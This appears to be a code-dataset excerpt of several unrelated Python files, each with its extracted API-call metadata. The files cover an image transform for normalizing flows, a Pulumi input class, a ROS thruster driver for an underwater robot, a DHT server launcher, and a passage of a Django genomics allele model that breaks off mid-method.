self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()])
self.alpha = 0.01
else:
raise AttributeError("Unknown dataset")
def __call__(self, image):
image = self.base_transform(image)
noise = (torch.rand_like(image) - 0.5) * (1/256.)
image = (image + noise).clip(0., 1.)
return torch.logit(self.alpha + (1 - 2 * self.alpha) * image)
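# Illustrative shape-check sketch, not part of the original module. MAF is
# abstract here (calc_loss is unimplemented), so this only exercises the
# forward pass and sampling; the dimensions used are arbitrary assumptions.
def _example_forward_and_sample():
    device = torch.device("cpu")
    maf = MAF(flow_dim=2, condition_dim=10, hidden_dim=64, num_blocks=4, device=device)
    x = torch.randn(8, 2)        # batch of 2-D points to transform
    cond = torch.randn(8, 10)    # conditioning vector per point
    z, logjac = maf.forward_flow(x, cond)
    samples = maf.sample(cond)   # inverse pass from the standard-normal prior
    return z.shape, logjac.shape, samples.shape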
| [
"torch.logit",
"torchvision.transforms.RandomHorizontalFlip",
"torch.load",
"torch.rand_like",
"torch.randperm",
"torch.no_grad",
"torch.tensor",
"torchvision.transforms.ToTensor"
] | [((2173, 2215), 'torch.load', 'torch.load', (['path'], {'map_location': 'self.device'}), '(path, map_location=self.device)\n', (2183, 2215), False, 'import torch\n'), ((2895, 2949), 'torch.logit', 'torch.logit', (['(self.alpha + (1 - 2 * self.alpha) * image)'], {}), '(self.alpha + (1 - 2 * self.alpha) * image)\n', (2906, 2949), False, 'import torch\n'), ((967, 999), 'torch.tensor', 'torch.tensor', (['(0.0)'], {'device': 'device'}), '(0.0, device=device)\n', (979, 999), False, 'import torch\n'), ((1016, 1048), 'torch.tensor', 'torch.tensor', (['(1.0)'], {'device': 'device'}), '(1.0, device=device)\n', (1028, 1048), False, 'import torch\n'), ((1804, 1819), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1817, 1819), False, 'import torch\n'), ((1465, 1480), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1478, 1480), False, 'import torch\n'), ((2794, 2816), 'torch.rand_like', 'torch.rand_like', (['image'], {}), '(image)\n', (2809, 2816), False, 'import torch\n'), ((2564, 2576), 'torchvision.transforms.ToTensor', 'T.ToTensor', ([], {}), '()\n', (2574, 2576), True, 'import torchvision.transforms as T\n'), ((2578, 2602), 'torchvision.transforms.RandomHorizontalFlip', 'T.RandomHorizontalFlip', ([], {}), '()\n', (2600, 2602), True, 'import torchvision.transforms as T\n'), ((726, 750), 'torch.randperm', 'torch.randperm', (['flow_dim'], {}), '(flow_dim)\n', (740, 750), False, 'import torch\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = [
'MappingMappingArgs',
]
@pulumi.input_type
class MappingMappingArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
id: pulumi.Input[str],
push_status: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "id", id)
if push_status is not None:
pulumi.set(__self__, "push_status", push_status)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="pushStatus")
def push_status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "push_status")
@push_status.setter
def push_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "push_status", value)
| [
"pulumi.get",
"pulumi.getter",
"pulumi.set"
] | [((1281, 1313), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""pushStatus"""'}), "(name='pushStatus')\n", (1294, 1313), False, 'import pulumi\n'), ((620, 666), 'pulumi.set', 'pulumi.set', (['__self__', '"""expression"""', 'expression'], {}), "(__self__, 'expression', expression)\n", (630, 666), False, 'import pulumi\n'), ((675, 705), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (685, 705), False, 'import pulumi\n'), ((899, 929), 'pulumi.get', 'pulumi.get', (['self', '"""expression"""'], {}), "(self, 'expression')\n", (909, 929), False, 'import pulumi\n'), ((1014, 1051), 'pulumi.set', 'pulumi.set', (['self', '"""expression"""', 'value'], {}), "(self, 'expression', value)\n", (1024, 1051), False, 'import pulumi\n'), ((1140, 1162), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (1150, 1162), False, 'import pulumi\n'), ((1231, 1260), 'pulumi.set', 'pulumi.set', (['self', '"""id"""', 'value'], {}), "(self, 'id', value)\n", (1241, 1260), False, 'import pulumi\n'), ((1387, 1418), 'pulumi.get', 'pulumi.get', (['self', '"""push_status"""'], {}), "(self, 'push_status')\n", (1397, 1418), False, 'import pulumi\n'), ((1515, 1553), 'pulumi.set', 'pulumi.set', (['self', '"""push_status"""', 'value'], {}), "(self, 'push_status', value)\n", (1525, 1553), False, 'import pulumi\n'), ((754, 802), 'pulumi.set', 'pulumi.set', (['__self__', '"""push_status"""', 'push_status'], {}), "(__self__, 'push_status', push_status)\n", (764, 802), False, 'import pulumi\n')] |
#!/usr/bin/env python
import numpy as np
import copy
import rospy
import rospkg
import rosparam
import threading
import argparse
from geometry_msgs.msg import Vector3
from std_msgs.msg import Header, Float64
from sub8_msgs.msg import Thrust, ThrusterStatus
from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point
from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster
from sub8_thruster_comm import thruster_comm_factory
from ros_alarms import AlarmBroadcaster, AlarmListener
lock = threading.Lock()
class BusVoltageMonitor(object):
'''
Class that estimates sub8's thruster bus voltage.
    As of May 2017, this is just a simple rolling average with a constant-width sliding
    window. However, the add_reading and get_voltage_estimate methods are kept as the
    interface for when smarter filtering is needed (see the usage sketch after this class).
'''
VMAX = 50 # volts
VMIN = 0 # volts
class VoltageReading(object):
def __init__(self, voltage, time):
self.v = voltage
self.t = time
def __init__(self, window_duration):
'''
window_duration - float (amount of seconds for which to keep a reading in the buffer)
'''
self.bus_voltage_alarm = AlarmBroadcaster("bus-voltage")
self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1)
self.warn_voltage = rospy.get_param("/battery/warn_voltage", 44.5)
self.kill_voltage = rospy.get_param("/battery/kill_voltage", 44.0)
self.last_estimate_time = rospy.Time.now()
self.WINDOW_DURATION = rospy.Duration(window_duration)
self.ESTIMATION_PERIOD = rospy.Duration(0.2)
self.cached_severity = 0
self.buffer = []
def add_reading(self, voltage, time):
''' Adds voltage readings to buffer '''
voltage = float(voltage)
# Only add if it makes sense (the M5's will give nonsense feedback at times)
if voltage >= self.VMIN and voltage <= self.VMAX:
self.buffer.append(self.VoltageReading(voltage, time))
self.prune_buffer()
# check bus voltage if enough time has passed
        if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD:
            self.last_estimate_time = rospy.Time.now()
            self.check_bus_voltage()
def prune_buffer(self):
''' Removes readings older than the window_duration from buffer '''
for reading in self.buffer:
age = rospy.Time.now() - reading.t
if age > self.WINDOW_DURATION:
self.buffer.remove(reading)
def get_voltage_estimate(self):
''' Returns average voltage in buffer '''
voltages = []
if len(self.buffer) == 0:
return None
for r in self.buffer:
voltages.append(r.v)
return np.mean(voltages)
def check_bus_voltage(self):
''' Publishes bus_voltage estimate and raises alarm if necessary '''
bus_voltage = self.get_voltage_estimate()
if bus_voltage is None:
return
self.bus_voltage_pub.publish(Float64(bus_voltage))
severity = None
if bus_voltage < self.warn_voltage:
severity = 3
if bus_voltage < self.kill_voltage:
severity = 5
if severity is not None and self.cached_severity != severity:
self.bus_voltage_alarm.raise_alarm(
problem_description='Bus voltage has fallen to {}'.format(bus_voltage),
parameters={'bus_voltage': bus_voltage},
severity=severity
)
self.cached_severity = severity
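# Illustrative sketch, not part of the original driver: feeding voltage readings
# into the monitor by hand. It assumes a ROS node is already initialized, since
# the monitor creates a publisher and reads battery parameters on construction.
def _example_bus_voltage_monitor():
    monitor = BusVoltageMonitor(window_duration=30.0)
    for voltage in (46.1, 46.0, 45.9):
        monitor.add_reading(voltage, rospy.Time.now())
    return monitor.get_voltage_estimate()  # rolling average over the window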
class ThrusterDriver(object):
_dropped_timeout = 1.0 # s
_window_duration = 30.0 # s
_NODE_NAME = rospy.get_name()
def __init__(self, ports_layout, thruster_definitions):
'''Thruster driver, an object for commanding all of the sub's thrusters
- Gather configuration data and make it available to other nodes
- Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters
- Track a thrust_dict, which maps thruster names to the appropriate port
- Given a command message, route that command to the appropriate port/thruster
- Send a thruster status message describing the status of the particular thruster
'''
self.failed_thrusters = set() # This is only determined by comms
self.deactivated_thrusters = set() # These will not come back online even if comms are good (user managed)
# Alarms
self.thruster_out_alarm = AlarmBroadcaster("thruster-out")
AlarmListener("thruster-out", self.check_alarm_status, call_when_raised=False) # Prevent outside interference
# Create ThrusterPort objects in a dict indexed by port name
self.load_thruster_ports(ports_layout, thruster_definitions)
# Feedback on thrusters (thruster mapper blocks until it can use this service)
self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info)
self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10)
for name in self.thruster_to_port_map.keys()}
# These alarms require this service to be available before things will work
rospy.wait_for_service("update_thruster_layout")
self.update_thruster_out_alarm()
# Bus voltage
self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration)
# Command thrusters
self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1)
# To programmatically deactivate thrusters
self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster)
self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster)
@thread_lock(lock)
def load_thruster_ports(self, ports_layout, thruster_definitions):
''' Loads a dictionary ThrusterPort objects '''
self.ports = {} # ThrusterPort objects
self.thruster_to_port_map = {} # node_id to ThrusterPort
rospack = rospkg.RosPack()
self.make_fake = rospy.get_param('simulate', False)
if self.make_fake:
rospy.logwarn("Running fake thrusters for simulation, based on parameter '/simulate'")
# Instantiate thruster comms port
for port_info in ports_layout:
port_name = port_info['port']
self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake)
# Add the thrusters to the thruster dict and configure if present
for thruster_name in port_info['thruster_names']:
self.thruster_to_port_map[thruster_name] = port_info['port']
if thruster_name not in self.ports[port_name].online_thruster_names:
rospy.logerr("ThrusterDriver: {} IS MISSING!".format(thruster_name))
else:
rospy.loginfo("ThrusterDriver: {} registered".format(thruster_name))
# Set firmware settings
port = self.ports[port_name]
node_id = thruster_definitions[thruster_name]['node_id']
config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' +
thruster_name + '.yaml')
rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name,
config_path))
port.set_registers_from_dict(node_id=node_id,
reg_dict=rosparam.load_file(config_path)[0][0])
port.reboot_thruster(node_id) # Necessary for some settings to take effect
def get_thruster_info(self, srv):
''' Get the thruster info for a particular thruster name '''
query_name = srv.thruster_name
info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name]
thruster_info = ThrusterInfoResponse(
node_id=info.node_id,
min_force=info.thrust_bounds[0],
max_force=info.thrust_bounds[1],
position=numpy_to_point(info.position),
direction=Vector3(*info.direction)
)
return thruster_info
def check_alarm_status(self, alarm):
# If someone else cleared this alarm, we need to make sure to raise it again
if not alarm.raised and alarm.node_name != self._NODE_NAME:
self.update_thruster_out_alarm()
def update_thruster_out_alarm(self):
'''
Raises or clears the thruster out alarm
Updates the 'offline_thruster_names' parameter accordingly
Sets the severity to the number of failed thrusters (clipped at 5)
'''
offline_names = list(self.failed_thrusters)
if len(self.failed_thrusters) > 0:
self.thruster_out_alarm.raise_alarm(
node_name=self._NODE_NAME,
parameters={'offline_thruster_names': offline_names},
severity=int(np.clip(len(self.failed_thrusters), 1, 5)))
else:
self.thruster_out_alarm.clear_alarm(
node_name=self._NODE_NAME,
parameters={'offline_thruster_names': offline_names})
@thread_lock(lock)
def command_thruster(self, name, thrust):
'''
        Issue a force command (in Newtons) to a named thruster
        Example names are BLR, FLH, etc.
        Logs a warning if a thrust value outside of the configured thrust bounds is commanded
        Logs a warning if a non-zero thrust is commanded to a thruster that is offline
'''
port_name = self.thruster_to_port_map[name]
target_port = self.ports[port_name]
thruster_model = target_port.thruster_info[name]
if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]:
rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format(
thrust, thruster_model.thrust_bounds))
if name in self.failed_thrusters:
if not np.isclose(thrust, 0):
rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name + ')')
effort = target_port.thruster_info[name].get_effort_from_thrust(thrust)
# We immediately get thruster_status back
thruster_status = target_port.command_thruster(name, effort)
# Keep track of thrusters going online or offline
offline_on_port = target_port.get_offline_thruster_names()
for offline in offline_on_port:
if offline not in self.failed_thrusters:
self.failed_thrusters.add(offline) # Thruster went offline
for failed in copy.deepcopy(self.failed_thrusters):
if (failed in target_port.get_declared_thruster_names() and
failed not in offline_on_port and
failed not in self.deactivated_thrusters):
self.failed_thrusters.remove(failed) # Thruster came online
# Don't try to do anything if the thruster status is bad
if thruster_status is None:
return
message_contents = [
'rpm',
'bus_v',
'bus_i',
'temp',
'fault',
'command_tx_count',
'status_rx_count',
'command_latency_avg'
]
message_keyword_args = {key: thruster_status[key] for key in message_contents}
power = thruster_status['bus_v'] * thruster_status['bus_i']
self.status_publishers[name].publish(
ThrusterStatus(
header=Header(stamp=rospy.Time.now()),
name=name,
node_id=thruster_model.node_id,
power=power,
effort=effort,
thrust=thrust,
**message_keyword_args
)
)
# Will publish bus_voltage and raise alarm if necessary
self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now())
# Undervolt/overvolt faults are unreliable (might not still be true - David)
if message_keyword_args['fault'] > 2:
fault_codes = {
(1 << 0): 'UNDERVOLT',
                (1 << 1): 'OVERVOLT',
(1 << 2): 'OVERCURRENT',
(1 << 3): 'OVERTEMP',
(1 << 4): 'STALL',
(1 << 5): 'STALL_WARN',
}
fault = int(message_keyword_args['fault'])
faults = []
for code, fault_name in fault_codes.items():
if code & fault != 0:
faults.append(fault_name)
rospy.logwarn("Thruster: {} has entered fault with status {}".format(name, message_keyword_args))
rospy.logwarn("Fault causes are: {}".format(faults))
return
def thrust_cb(self, msg):
'''
Callback for receiving thrust commands
These messages contain a list of instructions, one for each thruster
If there are any updates to the list of failed thrusters, it will raise and alarm
'''
failed_before = {x for x in self.failed_thrusters}
for thrust_cmd in list(msg.thruster_commands):
self.command_thruster(thrust_cmd.name, thrust_cmd.thrust)
# Raise or clear 'thruster-out' alarm
if not self.failed_thrusters == failed_before:
            rospy.logdebug('Failed thrusters: %s', self.failed_thrusters)
self.update_thruster_out_alarm()
def stop(self):
''' Commands 0 thrust to all thrusters '''
for port in self.ports.values():
for thruster_name in port.online_thruster_names.copy():
self.command_thruster(thruster_name, 0.0)
def fail_thruster(self, srv):
''' Makes a thruster unavailable for thrust allocation '''
# So that thrust is not allocated to the thruster
self.failed_thrusters.add(srv.thruster_name)
# So that it won't come back online even if comms are good
self.deactivated_thrusters.add(srv.thruster_name)
# So that thruster_mapper updates the B-matrix
self.update_thruster_out_alarm()
return {}
def unfail_thruster(self, srv):
''' Undoes effect of self.fail_thruster '''
self.failed_thrusters.remove(srv.thruster_name)
self.deactivated_thrusters.remove(srv.thruster_name)
self.update_thruster_out_alarm()
return {}
if __name__ == '__main__':
PKG = 'sub8_videoray_m5_thruster'
usage_msg = "Interface to Sub8's VideoRay M5 thrusters"
desc_msg = "Specify a path to the configuration.json file containing the thrust calibration data"
parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg)
args = parser.parse_args(rospy.myargv()[1:])
rospy.init_node('videoray_m5_thruster_driver')
layout_parameter = '/thruster_layout'
rospy.loginfo("Thruster Driver waiting for parameter, {}".format(layout_parameter))
thruster_layout = wait_for_param(layout_parameter)
if thruster_layout is None:
raise IOError('/thruster_layout rosparam needs to be set before launching the thruster driver')
thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'], thruster_layout['thrusters'])
rospy.spin()
| [
"geometry_msgs.msg.Vector3",
"rosparam.load_file",
"rospy.Subscriber",
"argparse.ArgumentParser",
"mil_ros_tools.thread_lock",
"std_msgs.msg.Float64",
"numpy.mean",
"numpy.isclose",
"rospy.get_name",
"mil_ros_tools.numpy_to_point",
"ros_alarms.AlarmBroadcaster",
"rospy.Duration",
"rospy.logwarn",
"mil_ros_tools.wait_for_param",
"rospy.Time.now",
"threading.Lock",
"rospy.init_node",
"rospy.wait_for_service",
"copy.deepcopy",
"rospy.logdebug",
"sub8_thruster_comm.thruster_comm_factory",
"rospy.Service",
"ros_alarms.AlarmListener",
"rospkg.RosPack",
"rospy.Publisher",
"rospy.get_param",
"rospy.spin",
"rospy.myargv"
] | [((533, 549), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (547, 549), False, 'import threading\n'), ((3696, 3712), 'rospy.get_name', 'rospy.get_name', ([], {}), '()\n', (3710, 3712), False, 'import rospy\n'), ((5932, 5949), 'mil_ros_tools.thread_lock', 'thread_lock', (['lock'], {}), '(lock)\n', (5943, 5949), False, 'from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point\n'), ((9489, 9506), 'mil_ros_tools.thread_lock', 'thread_lock', (['lock'], {}), '(lock)\n', (9500, 9506), False, 'from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point\n'), ((15046, 15108), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'usage': 'usage_msg', 'description': 'desc_msg'}), '(usage=usage_msg, description=desc_msg)\n', (15069, 15108), False, 'import argparse\n'), ((15163, 15209), 'rospy.init_node', 'rospy.init_node', (['"""videoray_m5_thruster_driver"""'], {}), "('videoray_m5_thruster_driver')\n", (15178, 15209), False, 'import rospy\n'), ((15363, 15395), 'mil_ros_tools.wait_for_param', 'wait_for_param', (['layout_parameter'], {}), '(layout_parameter)\n', (15377, 15395), False, 'from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point\n'), ((15639, 15651), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (15649, 15651), False, 'import rospy\n'), ((1222, 1253), 'ros_alarms.AlarmBroadcaster', 'AlarmBroadcaster', (['"""bus-voltage"""'], {}), "('bus-voltage')\n", (1238, 1253), False, 'from ros_alarms import AlarmBroadcaster, AlarmListener\n'), ((1285, 1338), 'rospy.Publisher', 'rospy.Publisher', (['"""bus_voltage"""', 'Float64'], {'queue_size': '(1)'}), "('bus_voltage', Float64, queue_size=1)\n", (1300, 1338), False, 'import rospy\n'), ((1367, 1413), 'rospy.get_param', 'rospy.get_param', (['"""/battery/warn_voltage"""', '(44.5)'], {}), "('/battery/warn_voltage', 44.5)\n", (1382, 1413), False, 'import rospy\n'), ((1442, 1488), 'rospy.get_param', 'rospy.get_param', (['"""/battery/kill_voltage"""', '(44.0)'], {}), "('/battery/kill_voltage', 44.0)\n", (1457, 1488), False, 'import rospy\n'), ((1523, 1539), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (1537, 1539), False, 'import rospy\n'), ((1571, 1602), 'rospy.Duration', 'rospy.Duration', (['window_duration'], {}), '(window_duration)\n', (1585, 1602), False, 'import rospy\n'), ((1636, 1655), 'rospy.Duration', 'rospy.Duration', (['(0.2)'], {}), '(0.2)\n', (1650, 1655), False, 'import rospy\n'), ((2773, 2790), 'numpy.mean', 'np.mean', (['voltages'], {}), '(voltages)\n', (2780, 2790), True, 'import numpy as np\n'), ((4562, 4594), 'ros_alarms.AlarmBroadcaster', 'AlarmBroadcaster', (['"""thruster-out"""'], {}), "('thruster-out')\n", (4578, 4594), False, 'from ros_alarms import AlarmBroadcaster, AlarmListener\n'), ((4603, 4681), 'ros_alarms.AlarmListener', 'AlarmListener', (['"""thruster-out"""', 'self.check_alarm_status'], {'call_when_raised': '(False)'}), "('thruster-out', self.check_alarm_status, call_when_raised=False)\n", (4616, 4681), False, 'from ros_alarms import AlarmBroadcaster, AlarmListener\n'), ((4978, 5056), 'rospy.Service', 'rospy.Service', (['"""thrusters/thruster_info"""', 'ThrusterInfo', 'self.get_thruster_info'], {}), "('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info)\n", (4991, 5056), False, 'import rospy\n'), ((5345, 5393), 'rospy.wait_for_service', 'rospy.wait_for_service', (['"""update_thruster_layout"""'], {}), "('update_thruster_layout')\n", (5367, 5393), False, 'import rospy\n'), ((5589, 5663), 'rospy.Subscriber', 'rospy.Subscriber', 
(['"""thrusters/thrust"""', 'Thrust', 'self.thrust_cb'], {'queue_size': '(1)'}), "('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1)\n", (5605, 5663), False, 'import rospy\n'), ((5752, 5816), 'rospy.Service', 'rospy.Service', (['"""fail_thruster"""', 'FailThruster', 'self.fail_thruster'], {}), "('fail_thruster', FailThruster, self.fail_thruster)\n", (5765, 5816), False, 'import rospy\n'), ((5855, 5925), 'rospy.Service', 'rospy.Service', (['"""unfail_thruster"""', 'UnfailThruster', 'self.unfail_thruster'], {}), "('unfail_thruster', UnfailThruster, self.unfail_thruster)\n", (5868, 5925), False, 'import rospy\n'), ((6234, 6250), 'rospkg.RosPack', 'rospkg.RosPack', ([], {}), '()\n', (6248, 6250), False, 'import rospkg\n'), ((6277, 6311), 'rospy.get_param', 'rospy.get_param', (['"""simulate"""', '(False)'], {}), "('simulate', False)\n", (6292, 6311), False, 'import rospy\n'), ((11021, 11057), 'copy.deepcopy', 'copy.deepcopy', (['self.failed_thrusters'], {}), '(self.failed_thrusters)\n', (11034, 11057), False, 'import copy\n'), ((3041, 3061), 'std_msgs.msg.Float64', 'Float64', (['bus_voltage'], {}), '(bus_voltage)\n', (3048, 3061), False, 'from std_msgs.msg import Header, Float64\n'), ((5097, 5171), 'rospy.Publisher', 'rospy.Publisher', (["('thrusters/status/' + name)", 'ThrusterStatus'], {'queue_size': '(10)'}), "('thrusters/status/' + name, ThrusterStatus, queue_size=10)\n", (5112, 5171), False, 'import rospy\n'), ((6351, 6442), 'rospy.logwarn', 'rospy.logwarn', (['"""Running fake thrusters for simulation, based on parameter \'/simulate\'"""'], {}), '(\n "Running fake thrusters for simulation, based on parameter \'/simulate\'")\n', (6364, 6442), False, 'import rospy\n'), ((6598, 6673), 'sub8_thruster_comm.thruster_comm_factory', 'thruster_comm_factory', (['port_info', 'thruster_definitions'], {'fake': 'self.make_fake'}), '(port_info, thruster_definitions, fake=self.make_fake)\n', (6619, 6673), False, 'from sub8_thruster_comm import thruster_comm_factory\n'), ((12340, 12356), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (12354, 12356), False, 'import rospy\n'), ((13742, 13800), 'rospy.logdebug', 'rospy.logdebug', (['"""Failed thrusters:"""', 'self.failed_thrusters'], {}), "('Failed thrusters:', self.failed_thrusters)\n", (13756, 13800), False, 'import rospy\n'), ((15138, 15152), 'rospy.myargv', 'rospy.myargv', ([], {}), '()\n', (15150, 15152), False, 'import rospy\n'), ((2147, 2163), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (2161, 2163), False, 'import rospy\n'), ((2412, 2428), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (2426, 2428), False, 'import rospy\n'), ((8364, 8393), 'mil_ros_tools.numpy_to_point', 'numpy_to_point', (['info.position'], {}), '(info.position)\n', (8378, 8393), False, 'from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point\n'), ((8417, 8441), 'geometry_msgs.msg.Vector3', 'Vector3', (['*info.direction'], {}), '(*info.direction)\n', (8424, 8441), False, 'from geometry_msgs.msg import Vector3\n'), ((10363, 10384), 'numpy.isclose', 'np.isclose', (['thrust', '(0)'], {}), '(thrust, 0)\n', (10373, 10384), True, 'import numpy as np\n'), ((10402, 10505), 'rospy.logwarn', 'rospy.logwarn', (["('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name +\n ')')"], {}), "(\n 'ThrusterDriver: commanding non-zero thrust to offline thruster (' +\n name + ')')\n", (10415, 10505), False, 'import rospy\n'), ((11951, 11967), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (11965, 11967), False, 'import rospy\n'), 
((7799, 7830), 'rosparam.load_file', 'rosparam.load_file', (['config_path'], {}), '(config_path)\n', (7817, 7830), False, 'import rosparam\n')] |
#!/usr/bin/env python
from argparse import ArgumentParser
from dht.server import app
if __name__ == '__main__':
parser = ArgumentParser(
description='PiplineDHT -- A simple distributed hash table')
parser.add_argument('-n', '--name', action='store', required=True,
help='name of node')
parser.add_argument('-k', '--host', action='store', default='localhost',
help='hostname to bind to')
parser.add_argument('-p', '--port', action='store', type=int,
required=True, help='port to bind to')
args = parser.parse_args()
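    # Run the DHT node's server, binding to the requested host/port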
app.run(host=args.host, port=args.port)
| [
"dht.server.app.run",
"argparse.ArgumentParser"
] | [((126, 201), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""PiplineDHT -- A simple distributed hash table"""'}), "(description='PiplineDHT -- A simple distributed hash table')\n", (140, 201), False, 'from argparse import ArgumentParser\n'), ((602, 641), 'dht.server.app.run', 'app.run', ([], {'host': 'args.host', 'port': 'args.port'}), '(host=args.host, port=args.port)\n', (609, 641), False, 'from dht.server import app\n')] |
import collections
import logging
import re
from typing import Optional, Pattern, Tuple, Iterable, Set
import django.dispatch
from django.conf import settings
from django.contrib.auth.models import User
from django.db import models, IntegrityError
from django.db.models import Value as V, QuerySet, F
from django.db.models.deletion import CASCADE, DO_NOTHING
from django.db.models.fields import TextField
from django.db.models.functions import Greatest
from django.db.models.functions.text import Concat
from django.db.models.query_utils import Q, FilteredRelation
from django.dispatch import receiver
from django.urls.base import reverse
from django_extensions.db.models import TimeStampedModel
from lazy import lazy
from model_utils.managers import InheritanceManager
from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos
from flags.models.models import FlagsMixin, FlagTypeContext
from library.django_utils.django_partition import RelatedModelsPartitionModel
from library.genomics import format_chrom
from library.utils import md5sum_str
from snpdb.models import Wiki
from snpdb.models.flag_types import allele_flag_types
from snpdb.models.models_clingen_allele import ClinGenAllele
from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus
from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig
LOCUS_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)$", re.IGNORECASE)
LOCUS_NO_REF_PATTERN = r"^([^:]+):(\d+)$"
VARIANT_PATTERN = re.compile(r"^([^:]+):(\d+)[,\s]*([GATC]+)>(=|[GATC]+)$", re.IGNORECASE)
allele_validate_signal = django.dispatch.Signal(providing_args=["allele"])
class Allele(FlagsMixin, models.Model):
""" Genome build independent - ie GRCh37 and GRCh38 variants for same change point to same allele
This is generally done via ClinGen Allele Registry, but sometimes that can fail.
Linked against Variant with VariantAllele below """
clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE)
def get_absolute_url(self):
# will show allele if there is one, otherwise go to variant page
return reverse('view_allele', kwargs={"pk": self.id})
def flag_type_context(self) -> FlagTypeContext:
return FlagTypeContext.objects.get(pk="allele")
@lazy
def clingen_error(self):
error = None
if va := self.variantallele_set.filter(error__isnull=False).first():
error = va.error
return error
def variant_alleles(self):
return self.variantallele_set.order_by("genome_build__name")
@lazy
def grch37(self) -> Optional['Variant']:
try:
return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False)
except ValueError:
return None
@lazy
def grch38(self) -> Optional['Variant']:
try:
return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False)
except ValueError:
return None
@lazy
def variants(self):
return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True))
def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant':
vas = self.variant_alleles()
va = None
if genome_build:
va = vas.filter(genome_build=genome_build).first()
if not va and not best_attempt:
raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}')
if not va:
va = vas.first()
if va:
return va.variant
raise ValueError(f'Could not find any variants in allele {self.id}')
def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']:
""" Used by to write VCF coordinates during liftover. Can be slow (API call)
If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() """
from snpdb.models.models_dbsnp import DbSNP
from genes.hgvs import get_hgvs_variant_tuple
# Check if the other build shares existing contig
genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values())
for variant_allele in self.variantallele_set.all():
if variant_allele.variant.locus.contig_id in genome_build_contigs:
conversion_tool = AlleleConversionTool.SAME_CONTIG
variant_tuple = variant_allele.variant.as_tuple()
return conversion_tool, variant_tuple
conversion_tool = None
g_hgvs = None
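        # Prefer a g.HGVS from the ClinGen Allele Registry; if unavailable and dbSNP liftover is enabled, fall back to dbSNP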
if self.clingen_allele:
try:
g_hgvs = self.clingen_allele.get_g_hgvs(genome_build)
conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY
except ValueError: # Various contig errors all subclass from this
pass
if g_hgvs is None:
if settings.LIFTOVER_DBSNP_ENABLED:
